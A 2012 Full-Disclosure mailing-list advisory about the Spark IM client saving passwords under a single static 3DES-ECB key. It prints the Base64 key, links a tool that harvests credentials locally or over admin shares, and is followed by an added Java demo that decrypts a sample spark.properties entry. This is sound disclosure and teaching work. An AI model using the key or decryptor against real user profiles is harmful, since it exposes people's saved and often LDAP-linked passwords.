Date: Mon, 30 Jul 2012 11:36:19 -0400
From: Adam Caudill <adam@...mcaudill.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Spark IM Client Local Password Decryption

The open source Spark IM client from Ignite Realtime has a feature
that can save the user's password - this password is stored insecurely
due to the use of a static encryption key.

The password is stored in a file called "spark.properties" and is
encrypted with Triple DES in ECB mode. The problem is that the key
used to encrypt it is static (see the source file "Encryptor.java"),
so all users of the application share a single key to 'protect' their
password. Because of this, it's trivial to write a tool to scan for
and decrypt these passwords.

The Base64 encoded key is: ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae

I've written a simple tool (link below) that will scan a system
(Windows only) and provide a list of recovered user names and
passwords; to simplify auditing, it can also scan remote systems by
using the administrative share. To perform this scan, the attacker
needs to have access to the user's profile directory either via local
administrator privileges or misconfigured permissions.

Spark is often used with the Openfire jabber server (also from Ignite
Realtime) as an internal IM solution, and can be configured to use
LDAP for authentication - which makes the recovered credentials far
more interesting.

As of the current version (2.6.3), there does not seem to be a way to
disable this feature.

More details: http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/
Decryption Tool: https://github.com/adamcaudill/sparkim-passview
Spark: http://www.igniterealtime.org/projects/spark/

My apologies if this had been previously documented; in my research I
was unable to find anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
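The following is an added demonstration of the weakness described in the post above; it is not Spark's own Encryptor.java nor the sparkim-passview tool. The only value taken from the post is the Base64 static key. The property names "username" and "password", the Base64 encoding of the stored ciphertext, and the "DESede/ECB/PKCS5Padding" transformation (Java's default for a plain "DESede" cipher) are assumptions about how spark.properties is laid out. The program plays both sides: it produces a constructed spark.properties body the way a client saving a password would, then recovers the cleartext using nothing but the shared key, and finally shows why ECB additionally leaks repeated plaintext blocks.

```java
import java.io.IOException;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.util.Arrays;
import java.util.Base64;
import java.util.Properties;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.spec.SecretKeySpec;

/**
 * Added example (not Spark project code). Shows that a static 3DES/ECB key
 * gives no confidentiality: anyone who knows the key, i.e. anyone who reads
 * the source, decrypts every user's saved password. Property names and the
 * Base64 wrapping of the ciphertext are assumptions about spark.properties.
 */
public class SparkStaticKeyDemo {
    // Static key as quoted in the advisory (Base64, decodes to 24 bytes).
    static final String STATIC_KEY_B64 = "ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae";
    // Assumption: Java's plain "DESede" transformation defaults to ECB/PKCS5Padding.
    static final String TRANSFORM = "DESede/ECB/PKCS5Padding";

    static SecretKey staticKey() {
        byte[] raw = Base64.getDecoder().decode(STATIC_KEY_B64);
        if (raw.length != 24) {
            throw new IllegalStateException("expected 24-byte 3DES key, got " + raw.length);
        }
        return new SecretKeySpec(raw, "DESede");
    }

    static byte[] run(int mode, byte[] input) throws GeneralSecurityException {
        Cipher c = Cipher.getInstance(TRANSFORM);
        c.init(mode, staticKey()); // same key for every installation, no IV in ECB
        return c.doFinal(input);
    }

    /** What a client does on "save password": 3DES-ECB under the shared key, then Base64. */
    static String encrypt(String plaintext) throws GeneralSecurityException {
        byte[] ct = run(Cipher.ENCRYPT_MODE, plaintext.getBytes(StandardCharsets.UTF_8));
        return Base64.getEncoder().encodeToString(ct);
    }

    /** What anyone holding the static key can do with a stored value. */
    static String decrypt(String b64) throws GeneralSecurityException {
        byte[] pt = run(Cipher.DECRYPT_MODE, Base64.getDecoder().decode(b64));
        return new String(pt, StandardCharsets.UTF_8);
    }

    /** Parse a properties file body and return {username, cleartext password or null}. */
    static String[] recover(String propertiesText) throws IOException, GeneralSecurityException {
        Properties props = new Properties();
        props.load(new StringReader(propertiesText));
        String user = props.getProperty("username", "<none>");  // assumed property name
        String enc = props.getProperty("password");             // assumed property name
        if (enc == null || enc.isEmpty()) {
            return new String[] { user, null }; // no saved password in this profile
        }
        return new String[] { user, decrypt(enc) };
    }

    /** ECB leaks structure: equal 8-byte plaintext blocks give equal ciphertext blocks. */
    static boolean firstTwoBlocksEqual(String plaintext) throws GeneralSecurityException {
        byte[] ct = run(Cipher.ENCRYPT_MODE, plaintext.getBytes(StandardCharsets.UTF_8));
        return Arrays.equals(Arrays.copyOfRange(ct, 0, 8), Arrays.copyOfRange(ct, 8, 16));
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample file body, as a client would write it after saving.
        String saved = "username=alice@example.org\n"
                     + "password=" + encrypt("Sup3rSecret!") + "\n";
        String[] creds = recover(saved);
        System.out.println("user=" + creds[0] + " password=" + creds[1]);

        // Sixteen identical bytes: the two ciphertext blocks are identical under ECB.
        System.out.println("ECB repetition visible: " + firstTwoBlocksEqual("AAAAAAAAAAAAAAAA"));
    }
}
```

Because the key is fixed and ECB uses no IV, the stored string is a deterministic function of the password alone: two users who chose the same password produce byte-identical "password=" values, so an auditor can match accounts across profiles even before decrypting anything. The fix is not a different hard-coded key but a per-user secret, for example a key held in the OS credential store or derived from a user-supplied master password.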